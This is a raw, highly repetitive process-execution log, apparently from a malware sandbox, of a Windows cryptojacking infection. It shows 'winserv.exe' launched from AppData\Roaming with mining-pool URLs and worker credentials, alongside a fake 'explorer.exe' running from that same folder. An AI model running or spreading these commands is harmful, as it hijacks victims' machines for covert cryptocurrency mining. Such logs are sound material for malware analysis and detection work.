cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
